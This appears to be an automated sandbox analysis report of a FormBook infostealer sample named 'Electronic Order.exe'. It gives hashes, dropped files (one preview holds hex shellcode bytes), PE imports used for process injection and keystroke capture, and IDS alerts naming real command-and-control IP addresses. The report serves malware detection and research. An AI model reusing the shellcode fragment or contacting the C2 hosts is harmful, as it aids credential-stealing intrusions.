                                    Process:C:\Users\user\Desktop\Electronic Order.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):9866
                                    Entropy (8bit):7.613111027447556
                                    Encrypted:false
                                    SSDEEP:192:ZyaFcKrLMynw1R9GCkEWAsd0Zv3ORpcAMh5tdGg/cLrmpzDL3q:3F7rwynwdGCgdMejcvvzGg0Lik
                                    MD5:C191A6F72B4E281F72045B7DCDF883DE
                                    SHA1:0E0ABA7FEFAD86555DF2DFB05AB8F74BE2CA3B26
                                    SHA-256:40721C2BA62153542CD7B48F83135120CB9D098C7D9240BFCADED7C825A0EF11
                                    SHA-512:C052F68FEE5843FF6B9A0AF8067C50D962260E124999D19FA3E3CE0D384C9DC84B112D5F77A2875B5C2921C88D8613CF26D5931853FDD55B06130ADB34F18C87
                                    Malicious:false
                                    Reputation:low
                                    Preview:EA06..pT..f.Y..4.Lf.9..D.P..I..3..h3j..s9..g3...g3..4:..E..&.i..8......D.Ph3...aB.Q..j5.q4.Pf....qb.....-..c.L...$.m5...k..c0.M....k8.X.3i...l..%.o2....A8.6,.........3k....e.N&s0.oNf.)...k.K$.eb....5..f.........6.0.o.p....l39....V0...S..$.if...6....f.I...@.....i8........X@.4.1..........$.P...0z.5..$}3Y.....=5..`d....!d..V...7f.[$..8...|.I..W.d...|vI..W.d...|vK..W.d...|vK(.W.e...|vY..W,.O...k.`..X@..9..^.8..F.6.z..G......`......i..G../Z...zqd...l.;.........|......7...}3{(........;^..l =..p.........3p.o....,.......x.....H<.lX.:...b.....,. ...2...f.[...K.)....b..i|v F......X......`....,.9....5...._..l......>K.....ir.e....[4..d..f.y.....,.....S >..p...........s9.... !..Y....f...ja4....ea.h,.p.....,.a8.,..3........f.....f ....,j.0..&...J......f ....6K%.ke..f....L..;2.X...4.Y.V@.Fn.....f@....l..05.....!;3.X...c )D.g6... ...'&`....,f.6..&....r...Brh.....l...i2...B....@.......d.L.`!.....P...@X5d..lSK...9...!;5.X...cVY......'.B...,vl.!..>.a..l...M..@...X...b.M&

                                    C:\Users\user\AppData\Local\Temp\nondefinition

                                    Download File
                                    Process:C:\Users\user\Desktop\Electronic Order.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):286208
                                    Entropy (8bit):7.99468258334443
                                    Encrypted:true
                                    SSDEEP:6144:h/SgBEFr2rkNagqfzb2vQ2IYfO49mC4VNkcF6Wdn+fF/FYJmC2u:h/VYNagUH2GYfOompVacFN+fdl1u
                                    MD5:225C61445560F7AE947612076F16BEFE
                                    SHA1:05738DC23D0ACC3670C14140EB0CD5DE65AED67F
                                    SHA-256:80CCFFB4EB2F7009B45DFDA32F002C9C9ACC3516A709DEF1758D4BA3A4B34B09
                                    SHA-512:736419BD099B969EA58376B8B8003AD7BEC253B3199D0DC8CBF08ABF3CA68F6F734032011AE36EA884AD3D3C2A21E7E917E26B84E37E8A0FA81000F2C6B6687E
                                    Malicious:false
                                    Preview:.....4C73.._...}.OM...k4;...VYX04ADONBL4C73AXMVYX04ADONBL4.73AVR.WX.=.e.O...._Z2x=$6?BU,d,/,"[7.Q$x?#7xYZa...b!['R.LUGrYX04ADO7CE.~WT.e-1.ePS.^..vT$.)..j9?....r"+..^P)e-1.X04ADONB.qC7.@YM...j4ADONBL4.71@SL]YX|0ADONBL4C7.UXMVIX04!@ONB.4C'3AXOVY^04ADONBJ4C73AXMV9\04CDONBL4A7s.XMFYX 4ADO^BL$C73AXMFYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04Aj;+:84C7..\MVIX04.@ONRL4C73AXMVYX04AdON"L4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73AXMVYX04ADONBL4C73A

                                    C:\Users\user\AppData\Local\Temp\unspawned

                                    Download File
                                    Process:C:\Users\user\Desktop\Electronic Order.exe
                                    File Type:ASCII text, with very long lines (28756), with no line terminators
                                    Category:dropped
                                    Size (bytes):28756
                                    Entropy (8bit):3.5967269015453844
                                    Encrypted:false
                                    SSDEEP:768:4iTZ+2QoioGRk6ZklputwjpjBkCiw2RuJ3nXKUrvzjsNbp+Iw6lr4vfF3if6gyTm:4iTZ+2QoioGRk6ZklputwjpjBkCiw2Rv
                                    MD5:39C24DBDBFBA355CDC547B3E45A2CFA8
                                    SHA1:405BD40524D9CC1874C719D0E9FCE6FD435E4855
                                    SHA-256:A6F17294F35431EB741CED44D61ECF81FA57C450DC73BD7F1F09B8F27CE0993D
                                    SHA-512:66FB2B75169FB27418F50682C79EF1EDF059A13D6B125FBA0358CE21E347B3FE0F6BBA9ED8E815E620F365CF193BC7B038E3ADB93B7A3CD9500A97B3A5DB05EE
                                    Malicious:false
                                    Preview:1A6E71D4810309FDFC6D43D3E9A6A999A1918E3376ACA2EEC40F44C89B681ADD6AA0260BDF66FE84DA0x558bec81eccc0200005657b86b00000066894584b96500000066894d86ba7200000066895588b86e0000006689458ab96500000066894d8cba6c0000006689558eb83300000066894590b93200000066894d92ba2e00000066895594b86400000066894596b96c00000066894d98ba6c0000006689559a33c06689459cb96e00000066898d44ffffffba7400000066899546ffffffb86400000066898548ffffffb96c00000066898d4affffffba6c0000006689954cffffffb82e0000006689854effffffb96400000066898d50ffffffba6c00000066899552ffffffb86c00000066898554ffffff33c966898d56ffffffba75000000668955d0b873000000668945d2b96500000066894dd4ba72000000668955d6b833000000668945d8b93200000066894ddaba2e000000668955dcb864000000668945deb96c00000066894de0ba6c000000668955e233c0668945e4b96100000066898d68ffffffba640000006689956affffffb8760000006689856cffffffb96100000066898d6effffffba7000000066899570ffffffb86900000066898572ffffffb93300000066898d74ffffffba3200000066899576ffffffb82e00000066898578ffffffb96400000066898d7affffff

                                    Static File Info

                                    General

                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Entropy (8bit):7.163132836165658
                                    TrID:
                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                    • DOS Executable Generic (2002/1) 0.02%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:Electronic Order.exe
                                    File size:1'205'760 bytes
                                    MD5:f44d956aa3a0c41f8e8ca7d9e9ead69c
                                    SHA1:5d4cd96731237a1d8a8e03aa078b0bda9d2296a3
                                    SHA256:48bae1515ac732f33a6fbd725dfb29fe55132b1f446f0efa201c1ad10cf0b1f6
                                    SHA512:e61d7c0a4e9fe6ef74b9dcbd76c3b526af3931485cbdc4e04bf7e19077b5050eabda611b712b8f4189716236b1bab3f27c07ccd259a4bb721e77b43747c51df4
                                    SSDEEP:24576:+AHnh+eWsN3skA4RV1Hom2KXMmHas5PNdmnDIZO2/wUcl5:ph+ZkldoPK8Yas51dmni/wUO
                                    TLSH:B245BE0273D1C036FFAB92739B6AB64596BC79254133852F13981DB9BD701B2223E763
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..

                                    File Icon

                                    Icon Hash:aaf3e3e3938382a0

                                    Static PE Info

                                    General

                                    Entrypoint:0x42800a
                                    Entrypoint Section:.text
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                    Time Stamp:0x668F14E2 [Wed Jul 10 23:10:26 2024 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:5
                                    OS Version Minor:1
                                    File Version Major:5
                                    File Version Minor:1
                                    Subsystem Version Major:5
                                    Subsystem Version Minor:1
                                    Import Hash:afcdf79be1557326c854b6e20cb900a7

                                    Entrypoint Preview

                                    Instruction
                                    call 00007F9474DDC6DDh
                                    jmp 00007F9474DCF494h
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    push edi
                                    push esi
                                    mov esi, dword ptr [esp+10h]
                                    mov ecx, dword ptr [esp+14h]
                                    mov edi, dword ptr [esp+0Ch]
                                    mov eax, ecx
                                    mov edx, ecx
                                    add eax, esi
                                    cmp edi, esi
                                    jbe 00007F9474DCF61Ah
                                    cmp edi, eax
                                    jc 00007F9474DCF97Eh
                                    bt dword ptr [004C41FCh], 01h
                                    jnc 00007F9474DCF619h
                                    rep movsb
                                    jmp 00007F9474DCF92Ch
                                    cmp ecx, 00000080h
                                    jc 00007F9474DCF7E4h
                                    mov eax, edi
                                    xor eax, esi
                                    test eax, 0000000Fh
                                    jne 00007F9474DCF620h
                                    bt dword ptr [004BF324h], 01h
                                    jc 00007F9474DCFAF0h
                                    bt dword ptr [004C41FCh], 00000000h
                                    jnc 00007F9474DCF7BDh
                                    test edi, 00000003h
                                    jne 00007F9474DCF7CEh
                                    test esi, 00000003h
                                    jne 00007F9474DCF7ADh
                                    bt edi, 02h
                                    jnc 00007F9474DCF61Fh
                                    mov eax, dword ptr [esi]
                                    sub ecx, 04h
                                    lea esi, dword ptr [esi+04h]
                                    mov dword ptr [edi], eax
                                    lea edi, dword ptr [edi+04h]
                                    bt edi, 03h
                                    jnc 00007F9474DCF623h
                                    movq xmm1, qword ptr [esi]
                                    sub ecx, 08h
                                    lea esi, dword ptr [esi+08h]
                                    movq qword ptr [edi], xmm1
                                    lea edi, dword ptr [edi+08h]
                                    test esi, 00000007h
                                    je 00007F9474DCF675h
                                    bt esi, 03h

                                    Rich Headers

                                    Programming Language:
                                    • [ASM] VS2013 build 21005
                                    • [ C ] VS2013 build 21005
                                    • [C++] VS2013 build 21005
                                    • [ C ] VS2008 SP1 build 30729
                                    • [IMP] VS2008 SP1 build 30729
                                    • [ASM] VS2013 UPD5 build 40629
                                    • [RES] VS2013 build 21005
                                    • [LNK] VS2013 UPD5 build 40629

                                    Data Directories

                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xbc0cc0x17c.rdata
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xc80000x5bf14.rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x1240000x7134.reloc
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa4b500x40.rdata
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                    Sections

                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    .text0x10000x8dfdd0x8e000310e36668512d53489c005622bb1b4a9False0.5735602580325704data6.675248351711057IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    .rdata0x8f0000x2fd8e0x2fe00748cf1ab2605ce1fd72d53d912abb68fFalse0.32828818537859006data5.763244005758284IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .data0xbf0000x8f740x5200aae9601d920f07080bdfadf43dfeff12False0.1017530487804878data1.1963819235530628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .rsrc0xc80000x5bf140x5c000ad2232649d454bf5658fecbc333f594bFalse0.9304597274116848data7.901873262269623IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .reloc0x1240000x71340x7200f04128ad0f87f42830e4a6cdbc38c719False0.7617530153508771data6.783955557128661IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                    Resources

                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                    RT_ICON0xc84a00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                    RT_ICON0xc85c80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                    RT_ICON0xc88b00x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                    RT_ICON0xc89d80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                    RT_ICON0xc98800x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                    RT_ICON0xca1280x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                    RT_ICON0xca6900x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                    RT_ICON0xccc380x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                    RT_ICON0xcdce00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                    RT_STRING0xce1480x594dataEnglishGreat Britain0.3333333333333333
                                    RT_STRING0xce6dc0x68adataEnglishGreat Britain0.2747909199522103
                                    RT_STRING0xced680x490dataEnglishGreat Britain0.3715753424657534
                                    RT_STRING0xcf1f80x5fcdataEnglishGreat Britain0.3087467362924282
                                    RT_STRING0xcf7f40x65cdataEnglishGreat Britain0.34336609336609336
                                    RT_STRING0xcfe500x466dataEnglishGreat Britain0.3605683836589698
                                    RT_STRING0xd02b80x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                    RT_RCDATA0xd04100x535aadata1.0003251146688223
                                    RT_GROUP_ICON0x1239bc0x76dataEnglishGreat Britain0.6610169491525424
                                    RT_GROUP_ICON0x123a340x14dataEnglishGreat Britain1.15
                                    RT_VERSION0x123a480xdcdataEnglishGreat Britain0.6181818181818182
                                    RT_MANIFEST0x123b240x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                    Imports

                                    DLLImport
                                    WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                    VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                    WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                    COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                    MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                    WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                    PSAPI.DLLGetProcessMemoryInfo
                                    IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                    USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                    UxTheme.dllIsThemeActive
                                    KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                    USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                    GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                    COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                    ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                    SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                    ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                    OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

                                    Possible Origin

                                    Language of compilation systemCountry where language is spokenMap
                                    EnglishGreat Britain

                                    Network Behavior

                                    Snort IDS Alerts

                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                    07/11/24-15:07:47.687248TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34975480192.168.2.6162.254.38.56
                                    07/11/24-15:06:19.325666TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34972880192.168.2.6188.114.97.3
                                    07/11/24-15:06:09.188758TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24972580192.168.2.6103.42.108.46
                                    07/11/24-15:06:46.273374TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34973680192.168.2.635.212.86.52
                                    07/11/24-15:06:03.503858TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34972280192.168.2.6103.42.108.46
                                    07/11/24-15:06:35.210818TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34973380192.168.2.6134.122.138.60
                                    07/11/24-15:07:22.659611TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24974880192.168.2.6188.114.97.3
                                    07/11/24-15:07:33.501313TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34975080192.168.2.6154.222.238.52
                                    07/11/24-15:07:02.361687TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34974180192.168.2.6188.114.96.3
                                    07/11/24-15:06:48.845266TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34973780192.168.2.635.212.86.52
                                    07/11/24-15:06:32.631655TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34973280192.168.2.6134.122.138.60
                                    07/11/24-15:06:40.341512TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24973580192.168.2.6134.122.138.60
                                    07/11/24-15:07:17.488664TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34974680192.168.2.6188.114.97.3
                                    07/11/24-15:06:00.490458TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34972180192.168.2.6103.42.108.46
                                    07/11/24-15:07:38.871550TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24975280192.168.2.6154.222.238.52
                                    07/11/24-15:05:38.936362TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24971880192.168.2.6142.250.186.115
                                    07/11/24-15:07:30.927773TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34974980192.168.2.6154.222.238.52
                                    07/11/24-15:06:59.761285TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34974080192.168.2.6188.114.96.3
                                    07/11/24-15:06:24.480321TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24973080192.168.2.6188.114.97.3
                                    07/11/24-15:07:14.913315TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34974580192.168.2.6188.114.97.3
                                    07/11/24-15:06:16.735802TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34972780192.168.2.6188.114.97.3
                                    07/11/24-15:07:45.121444TCP2855464ETPRO TROJAN FormBook CnC Checkin (POST) M34975380192.168.2.6162.254.38.56
                                    07/11/24-15:06:53.999548TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24973980192.168.2.635.212.86.52
                                    07/11/24-15:07:52.855523TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24975680192.168.2.6162.254.38.56
                                    07/11/24-15:07:07.976080TCP2855465ETPRO TROJAN FormBook CnC Checkin (GET) M24974380192.168.2.6188.114.96.3

                                    Network Port Distribution

                                    TCP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Jul 11, 2024 15:05:38.914575100 CEST4971880192.168.2.6142.250.186.115
                                    Jul 11, 2024 15:05:38.919574022 CEST8049718142.250.186.115192.168.2.6
                                    Jul 11, 2024 15:05:38.919703960 CEST4971880192.168.2.6142.250.186.115
                                    Jul 11, 2024 15:05:38.936362028 CEST4971880192.168.2.6142.250.186.115
                                    Jul 11, 2024 15:05:38.941772938 CEST8049718142.250.186.115192.168.2.6
